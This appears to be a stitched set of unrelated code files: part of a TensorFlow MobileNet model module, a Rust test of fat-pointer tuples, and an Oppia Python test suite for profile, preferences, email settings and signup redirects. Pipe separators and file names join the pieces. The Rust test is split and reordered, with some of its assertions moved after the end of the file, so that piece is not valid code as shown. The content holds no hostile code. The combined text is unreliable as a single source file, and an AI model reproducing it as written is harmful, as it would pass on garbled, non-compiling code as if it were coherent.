ValueError: Input rank is invalid.
"""
is_training = mobilenet_args.get('is_training', False)
input_shape = inputs.get_shape().as_list()
if len(input_shape) != 4:
raise ValueError('Expected rank 4 input, was: %d' % len(input_shape))
with tf.variable_scope(scope, 'Mobilenet', reuse=reuse) as scope:
inputs = tf.identity(inputs, 'input')
net, end_points = mobilenet_base(inputs, scope=scope, **mobilenet_args)
if base_only:
return net, end_points
net = tf.identity(net, name='embedding')
with tf.variable_scope('Logits'):
net = global_pool(net)
end_points['global_pool'] = net
if not num_classes:
return net, end_points
net = slim.dropout(net, scope='Dropout', is_training=is_training)
# 1 x 1 x num_classes
# Note: legacy scope name.
logits = slim.conv2d(
net,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
biases_initializer=tf.zeros_initializer(),
scope='Conv2d_1c_1x1')
logits = tf.squeeze(logits, [1, 2])
logits = tf.identity(logits, name='output')
end_points['Logits'] = logits
if prediction_fn:
end_points['Predictions'] = prediction_fn(logits, 'Predictions')
return logits, end_points
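# Minimal usage sketch (V2_DEF is an assumed conv-defs structure supplied by
# a concrete MobileNet module, e.g. mobilenet_v2; `images` is an assumed
# [batch, height, width, 3] tensor):
#   with slim.arg_scope(training_scope(is_training=False)):
#     logits, end_points = mobilenet(images, conv_defs=V2_DEF,
#                                    num_classes=1001)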
def global_pool(input_tensor, pool_op=tf.nn.avg_pool):
"""Applies avg pool to produce 1x1 output.
  NOTE: This function is functionally equivalent to reduce_mean, but it has a
  baked-in average pool, which has better support across hardware.
Args:
input_tensor: input tensor
pool_op: pooling op (avg pool is default)
Returns:
a tensor batch_size x 1 x 1 x depth.
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size = tf.convert_to_tensor(
[1, tf.shape(input_tensor)[1],
tf.shape(input_tensor)[2], 1])
else:
kernel_size = [1, shape[1], shape[2], 1]
output = pool_op(
input_tensor, ksize=kernel_size, strides=[1, 1, 1, 1], padding='VALID')
  # Recover the static output shape when the input shape is unknown.
output.set_shape([None, 1, 1, None])
return output
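# Illustrative shapes (assumed): a [2, 7, 7, 1280] feature map pools to
# [2, 1, 1, 1280]. With unknown height/width the kernel size is computed from
# tf.shape at run time, so the same graph handles variable input sizes.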
def training_scope(is_training=True,
weight_decay=0.00004,
stddev=0.09,
dropout_keep_prob=0.8,
bn_decay=0.997):
"""Defines Mobilenet training scope.
Usage:
with tf.contrib.slim.arg_scope(mobilenet.training_scope()):
logits, endpoints = mobilenet_v2.mobilenet(input_tensor)
     # the network created will be trainable with dropout/batch norm
# initialized appropriately.
Args:
is_training: if set to False this will ensure that all customizations are
set to non-training mode. This might be helpful for code that is reused
across both training/evaluation, but most of the time training_scope with
      value False is not needed. If this is set to None, the parameter is not
added to the batch_norm arg_scope.
weight_decay: The weight decay to use for regularizing the model.
stddev: Standard deviation for initialization, if negative uses xavier.
    dropout_keep_prob: dropout keep probability (not set if equal to None).
    bn_decay: decay for the batch norm moving averages (not set if equal to
      None).
Returns:
An argument scope to use via arg_scope.
"""
# Note: do not introduce parameters that would change the inference
# model here (for example whether to use bias), modify conv_def instead.
batch_norm_params = {
'decay': bn_decay,
'is_training': is_training
}
  if stddev < 0:
    weight_initializer = slim.initializers.xavier_initializer()
  else:
    weight_initializer = tf.truncated_normal_initializer(stddev=stddev)
# Set weight_decay for weights in Conv and FC layers.
with slim.arg_scope(
[slim.conv2d, slim.fully_connected, slim.separable_conv2d],
      weights_initializer=weight_initializer,
normalizer_fn=slim.batch_norm), \
slim.arg_scope([mobilenet_base, mobilenet], is_training=is_training),\
safe_arg_scope([slim.batch_norm], **batch_norm_params), \
safe_arg_scope([slim.dropout], is_training=is_training,
keep_prob=dropout_keep_prob), \
slim.arg_scope([slim.conv2d], \
weights_regularizer=slim.l2_regularizer(weight_decay)), \
slim.arg_scope([slim.separable_conv2d], weights_regularizer=None) as s:
return s
| multiplier = params.pop('multiplier_transorm', depth_multiplier)
return _Op(opfunc, params=params, multiplier_func=multiplier) |
dst-tuple.rs | // run-pass
#![allow(type_alias_bounds)]
#![feature(box_syntax)]
#![feature(unsized_tuple_coercion)]
type Fat<T: ?Sized> = (isize, &'static str, T);
// x is a fat pointer
fn foo(x: &Fat<[isize]>) {
let y = &x.2;
assert_eq!(x.2.len(), 3);
assert_eq!(y[0], 1); | assert_eq!(x.1, "some str");
}
fn foo2<T: ToBar>(x: &Fat<[T]>) {
let y = &x.2;
let bar = Bar;
assert_eq!(x.2.len(), 3);
assert_eq!(y[0].to_bar(), bar);
assert_eq!(x.2[1].to_bar(), bar);
assert_eq!(x.0, 5);
assert_eq!(x.1, "some str");
}
fn foo3(x: &Fat<Fat<[isize]>>) {
let y = &(x.2).2;
assert_eq!(x.0, 5);
assert_eq!(x.1, "some str");
assert_eq!((x.2).0, 8);
assert_eq!((x.2).1, "deep str");
assert_eq!((x.2).2.len(), 3);
assert_eq!(y[0], 1);
assert_eq!((x.2).2[1], 2);
}
#[derive(Copy, Clone, PartialEq, Eq, Debug)]
struct Bar;
trait ToBar {
fn to_bar(&self) -> Bar;
}
impl ToBar for Bar {
fn to_bar(&self) -> Bar {
*self
}
}
pub fn main() {
// With a vec of ints.
let f1 = (5, "some str", [1, 2, 3]);
foo(&f1);
let f2 = &f1;
foo(f2);
let f3: &Fat<[isize]> = f2;
foo(f3);
let f4: &Fat<[isize]> = &f1;
foo(f4);
let f5: &Fat<[isize]> = &(5, "some str", [1, 2, 3]);
foo(f5);
// With a vec of Bars.
let bar = Bar;
let f1 = (5, "some str", [bar, bar, bar]);
foo2(&f1);
let f2 = &f1;
foo2(f2);
let f3: &Fat<[Bar]> = f2;
foo2(f3);
let f4: &Fat<[Bar]> = &f1;
foo2(f4);
let f5: &Fat<[Bar]> = &(5, "some str", [bar, bar, bar]);
foo2(f5);
// Assignment.
let f5: &mut Fat<[isize]> = &mut (5, "some str", [1, 2, 3]);
f5.2[1] = 34;
assert_eq!(f5.2[0], 1);
assert_eq!(f5.2[1], 34);
assert_eq!(f5.2[2], 3);
// Zero size vec.
let f5: &Fat<[isize]> = &(5, "some str", []);
assert!(f5.2.is_empty());
let f5: &Fat<[Bar]> = &(5, "some str", []);
assert!(f5.2.is_empty());
// Deeply nested.
let f1 = (5, "some str", (8, "deep str", [1, 2, 3]));
foo3(&f1);
let f2 = &f1;
foo3(f2);
let f3: &Fat<Fat<[isize]>> = f2;
foo3(f3);
let f4: &Fat<Fat<[isize]>> = &f1;
foo3(f4);
let f5: &Fat<Fat<[isize]>> = &(5, "some str", (8, "deep str", [1, 2, 3]));
foo3(f5);
// Box.
let f1 = Box::new([1, 2, 3]);
assert_eq!((*f1)[1], 2);
let f2: Box<[isize]> = f1;
assert_eq!((*f2)[1], 2);
// Nested Box.
let f1 : Box<Fat<[isize; 3]>> = box (5, "some str", [1, 2, 3]);
foo(&*f1);
let f2 : Box<Fat<[isize]>> = f1;
foo(&*f2);
let f3 : Box<Fat<[isize]>> =
Box::<Fat<[_; 3]>>::new((5, "some str", [1, 2, 3]));
foo(&*f3);
} | assert_eq!(x.2[1], 2);
assert_eq!(x.0, 5); |
profile_test.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the profile page."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import datetime
import re
from constants import constants
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
from core.domain import subscription_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import utils
(user_models,) = models.Registry.import_models([models.NAMES.user])
class ProfilePageTests(test_utils.GenericTestBase):
def test_get_profile_page_of_non_existing_user_raises_status_404(self):
self.get_html_response(
'/profile/%s' % self.OWNER_USERNAME, expected_status_int=404)
def test_get_profile_page_of_existing_user(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
response = self.get_html_response('/profile/%s' % self.OWNER_USERNAME)
self.assertIn(
'<profile-page></profile-page>', response.body)
class ProfileDataHandlerTests(test_utils.GenericTestBase):
def test_preference_page_updates(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
original_preferences = self.get_json('/preferenceshandler/data')
self.assertEqual(
['en'], original_preferences['preferred_language_codes'])
self.assertIsNone(original_preferences['preferred_site_language_code'])
self.assertIsNone(original_preferences['preferred_audio_language_code'])
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_site_language_code', 'data': 'en'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_audio_language_code', 'data': 'hi-en'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_language_codes', 'data': ['de']},
csrf_token=csrf_token)
new_preferences = self.get_json('/preferenceshandler/data')
self.assertEqual(new_preferences['preferred_language_codes'], ['de'])
self.assertEqual(new_preferences['preferred_site_language_code'], 'en')
self.assertEqual(
new_preferences['preferred_audio_language_code'], 'hi-en')
def test_profile_data_is_independent_of_currently_logged_in_user(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data',
{'update_type': 'user_bio', 'data': 'My new editor bio'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'subject_interests', 'data': ['editor', 'editing']},
csrf_token=csrf_token)
self.logout()
self.signup(self.VIEWER_EMAIL, username=self.VIEWER_USERNAME)
self.login(self.VIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data',
{'update_type': 'user_bio', 'data': 'My new viewer bio'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'subject_interests', 'data': ['viewer', 'viewing']},
csrf_token=csrf_token)
self.logout()
# Viewer looks at editor's profile page.
self.login(self.VIEWER_EMAIL)
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
self.logout()
# Editor looks at their own profile page.
self.login(self.EDITOR_EMAIL)
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
self.logout()
        # Logged-out user looks at editor's profile page.
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
def test_preferences_page(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.PREFERENCES_URL)
self.assertIn('{"title": "Preferences - Oppia"})', response.body)
self.logout()
class UserContributionsTests(test_utils.GenericTestBase):
USERNAME_A = 'a'
EMAIL_A = '[email protected]'
USERNAME_B = 'b'
EMAIL_B = '[email protected]'
EXP_ID_1 = 'exp_id_1'
def test_null_case(self):
# Check that the profile page for a user with no contributions shows
# that they have 0 created/edited explorations.
self.signup(self.EMAIL_A, self.USERNAME_A)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_A)
self.assertEqual(
response_dict['created_exp_summary_dicts'], [])
self.assertEqual(
response_dict['edited_exp_summary_dicts'], [])
def test_created(self):
# Check that the profile page for a user who has created
# a single exploration shows 1 created and 1 edited exploration.
self.signup(self.EMAIL_A, self.USERNAME_A)
user_a_id = self.get_user_id_from_email(self.EMAIL_A)
user_a = user_services.UserActionsInfo(user_a_id)
self.save_new_valid_exploration(
self.EXP_ID_1, user_a_id, end_state_name='End')
rights_manager.publish_exploration(user_a, self.EXP_ID_1)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_A)
self.assertEqual(len(
response_dict['created_exp_summary_dicts']), 1)
self.assertEqual(len(
response_dict['edited_exp_summary_dicts']), 1)
self.assertEqual(
response_dict['created_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
def test_edited(self):
# Check that the profile page for a user who has created
# a single exploration shows 0 created and 1 edited exploration.
self.signup(self.EMAIL_A, self.USERNAME_A)
user_a_id = self.get_user_id_from_email(self.EMAIL_A)
self.signup(self.EMAIL_B, self.USERNAME_B)
user_b_id = self.get_user_id_from_email(self.EMAIL_B)
user_a = user_services.UserActionsInfo(user_a_id)
self.save_new_valid_exploration(
self.EXP_ID_1, user_a_id, end_state_name='End')
rights_manager.publish_exploration(user_a, self.EXP_ID_1)
exp_services.update_exploration(
user_b_id, self.EXP_ID_1, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_B)
self.assertEqual(len(
response_dict['created_exp_summary_dicts']), 0)
self.assertEqual(len(
response_dict['edited_exp_summary_dicts']), 1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['objective'],
'the objective')
class FirstContributionDateTests(test_utils.GenericTestBase):
USERNAME = 'abc123'
EMAIL = '[email protected]'
def test_contribution_msec(self):
# Test the contribution time shows up correctly as None.
self.signup(self.EMAIL, self.USERNAME)
self.login(self.EMAIL)
user_id = self.get_user_id_from_email(self.EMAIL)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertIsNone(response_dict['first_contribution_msec'])
# Update the first_contribution_msec to the current time in
# milliseconds.
first_time_in_msecs = utils.get_current_time_in_millisecs()
user_services.update_first_contribution_msec_if_not_set(
user_id, first_time_in_msecs)
        # Test that the contribution date correctly changes to
        # first_time_in_msecs.
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertEqual(
response_dict['first_contribution_msec'],
first_time_in_msecs)
# Test that the contribution date is not changed after the first time it
# is set.
second_time_in_msecs = utils.get_current_time_in_millisecs()
user_services.update_first_contribution_msec_if_not_set(
user_id, second_time_in_msecs)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertEqual(
response_dict['first_contribution_msec'],
first_time_in_msecs)
class PreferencesHandlerTests(test_utils.GenericTestBase):
EXP_ID = 'exp_id'
EXP_TITLE = 'Exploration title'
def setUp(self):
super(PreferencesHandlerTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def test_can_see_subscriptions(self):
self.login(self.VIEWER_EMAIL)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 0)
# Subscribe to user.
subscription_services.subscribe_to_creator(
self.viewer_id, self.owner_id)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 1)
self.assertEqual(
response['subscription_list'][0]['creator_username'],
self.OWNER_USERNAME)
# Unsubscribe from user.
subscription_services.unsubscribe_from_creator(
self.viewer_id, self.owner_id)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 0)
self.logout()
def test_can_update_profile_picture_data_url(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
user_settings = user_services.get_user_settings(self.owner_id)
self.assertTrue(
user_settings.profile_picture_data_url.startswith(
'data:image/png;'))
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'profile_picture_data_url',
'data': 'new_profile_picture_data_url'},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(self.owner_id)
self.assertEqual(
user_settings.profile_picture_data_url,
'new_profile_picture_data_url')
self.logout()
def test_can_update_default_dashboard(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
user_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(user_settings.default_dashboard)
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'default_dashboard',
'data': constants.DASHBOARD_TYPE_CREATOR},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(self.owner_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_CREATOR)
self.logout()
def test_update_preferences_with_invalid_update_type_raises_exception(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.assertRaisesRegexp(Exception, 'Invalid update type:'):
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'invalid_update_type'},
csrf_token=csrf_token)
self.logout()
class LongUserBioHandlerTests(test_utils.GenericTestBase):
USERNAME_A = 'a'
EMAIL_A = '[email protected]'
USERNAME_B = 'b'
EMAIL_B = '[email protected]'
def test_userbio_within_limit(self):
self.signup(self.EMAIL_A, self.USERNAME_A)
self.login(self.EMAIL_A)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data', {
'update_type': 'user_bio',
'data': 'I am within 2000 char limit',
}, csrf_token=csrf_token)
preferences = self.get_json('/preferenceshandler/data')
self.assertIsNotNone(preferences)
self.assertEqual(
preferences['user_bio'], 'I am within 2000 char limit')
self.logout()
def test_user_bio_exceeds_limit(self):
self.signup(self.EMAIL_B, self.USERNAME_B)
self.login(self.EMAIL_B)
csrf_token = self.get_new_csrf_token()
user_bio_response = self.put_json(
'/preferenceshandler/data', {
'update_type': 'user_bio',
'data': 'I am not within 2000 char limit' * 200
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(user_bio_response['status_code'], 400)
self.assertIn('User bio exceeds maximum character limit: 2000',
user_bio_response['error'])
self.logout()
class ProfileLinkTests(test_utils.GenericTestBase):
USERNAME = 'abc123'
EMAIL = '[email protected]'
PROFILE_PIC_URL = '/preferenceshandler/profile_picture_by_username/'
def test_get_profile_picture_invalid_username(self):
self.get_json(
'%s%s' % (self.PROFILE_PIC_URL, self.USERNAME),
expected_status_int=404)
def test_get_profile_picture_valid_username(self):
self.signup(self.EMAIL, self.USERNAME)
response_dict = self.get_json(
'%s%s' % (self.PROFILE_PIC_URL, self.USERNAME)
)
# Every user must have a profile picture.
self.assertEqual(
response_dict['profile_picture_data_url_for_username'],
user_services.DEFAULT_IDENTICON_DATA_URL)
class EmailPreferencesTests(test_utils.GenericTestBase):
def test_user_not_setting_email_prefs_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True},
csrf_token=csrf_token)
# The email update preference should be whatever the setting in feconf
# is.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_user_allowing_emails_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True,
'can_receive_email_updates': True},
csrf_token=csrf_token)
# The email update preference should be True in all cases.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_user_disallowing_emails_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True,
'can_receive_email_updates': False},
csrf_token=csrf_token)
# The email update preference should be False in all cases.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_email_preferences_updates(self):
"""Test that Preferences Handler correctly updates the email
preferences of the user.
"""
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'update_type': 'email_preferences',
'data': {
'can_receive_email_updates': True,
'can_receive_editor_role_email': True,
'can_receive_feedback_message_email': True,
'can_receive_subscription_email': True
}
}
# Allow all emails.
self.put_json(
'/preferenceshandler/data', payload, csrf_token=csrf_token)
email_preferences = user_services.get_email_preferences(editor_id)
self.assertTrue(email_preferences.can_receive_email_updates)
self.assertTrue(email_preferences.can_receive_editor_role_email)
self.assertTrue(email_preferences.can_receive_feedback_message_email)
self.assertTrue(email_preferences.can_receive_subscription_email)
payload = {
'update_type': 'email_preferences',
'data': {
'can_receive_email_updates': False,
'can_receive_editor_role_email': False,
'can_receive_feedback_message_email': False,
'can_receive_subscription_email': False
}
}
# Disallow all emails.
self.put_json(
'/preferenceshandler/data', payload, csrf_token=csrf_token)
email_preferences = user_services.get_email_preferences(editor_id)
self.assertFalse(email_preferences.can_receive_email_updates)
self.assertFalse(email_preferences.can_receive_editor_role_email)
self.assertFalse(email_preferences.can_receive_feedback_message_email)
self.assertFalse(email_preferences.can_receive_subscription_email)
class ProfilePictureHandlerTests(test_utils.GenericTestBase):
def test_get_profile_picture_with_updated_value(self):
self.get_json(
'/preferenceshandler/profile_picture', expected_status_int=401)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.login(self.OWNER_EMAIL)
user_settings = user_services.get_user_settings(owner_id)
response = self.get_json('/preferenceshandler/profile_picture')
self.assertEqual(
response['profile_picture_data_url'],
user_settings.profile_picture_data_url)
user_services.update_profile_picture_data_url(
owner_id, 'new_profile_picture')
response = self.get_json('/preferenceshandler/profile_picture')
self.assertEqual(
response['profile_picture_data_url'], 'new_profile_picture')
self.logout()
class SignupTests(test_utils.GenericTestBase):
def test_signup_page_does_not_have_top_right_menu(self):
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.SIGNUP_URL)
# Sign in can't be inside an html tag, but can appear inside js code.
response.mustcontain(no=['Logout'])
self.logout()
def test_going_somewhere_else_while_signing_in_logs_user_out(self):
exp_services.load_demo('0')
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.SIGNUP_URL)
response = self.get_html_response('/create/0', expected_status_int=302)
self.assertIn('logout', response.headers['location'])
self.assertIn('create', response.headers['location'])
self.logout()
def test_to_check_url_redirection_in_signup(self):
"""To validate the redirections from return_url."""
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
# Registering this user fully.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True},
csrf_token=csrf_token)
def strip_domain_from_location_header(url):
"""To strip the domain form the location url."""
splitted_url = re.match(r'(http[s]?:\/\/)?([^\/\s]+\/)(.*)', url)
return splitted_url.group(3)
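        # Example (illustrative): for
        # 'http://localhost/page/hello?id=tests' the match groups are
        # ('http://', 'localhost/', 'page/hello?id=tests'), so group(3)
        # yields the path-plus-query part.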
response = self.get_html_response(
'/signup?return_url=https://google.com', expected_status_int=302)
self.assertEqual('', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=//google.com', expected_status_int=302)
self.assertEqual('', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page#hello', expected_status_int=302)
self.assertEqual('page', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page/hello', expected_status_int=302)
self.assertEqual('page/hello', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page/hello?id=tests', expected_status_int=302)
self.assertEqual(
'page/hello?id=tests', strip_domain_from_location_header(
response.headers['location']))
self.logout()
def test_accepting_terms_is_handled_correctly(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL, {'agreed_to_terms': False},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('you will need to accept', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': 'Hasta la vista!'},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('you will need to accept', response_dict['error'])
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'myusername'},
csrf_token=csrf_token)
self.logout()
def test_username_is_handled_correctly(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL, {'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('Empty username supplied', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': '', 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('Empty username supplied', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': '!a!', 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': self.UNICODE_TEST_STRING, 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abcde', 'agreed_to_terms': True},
csrf_token=csrf_token)
self.logout()
def test_default_dashboard_for_new_users(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
# This user should have the creator dashboard as default.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'creatoruser',
'default_dashboard': constants.DASHBOARD_TYPE_CREATOR,
'can_receive_email_updates': None},
csrf_token=csrf_token)
user_id = user_services.get_user_id_from_username('creatoruser')
user_settings = user_services.get_user_settings(user_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_CREATOR)
self.logout()
self.login(self.VIEWER_EMAIL)
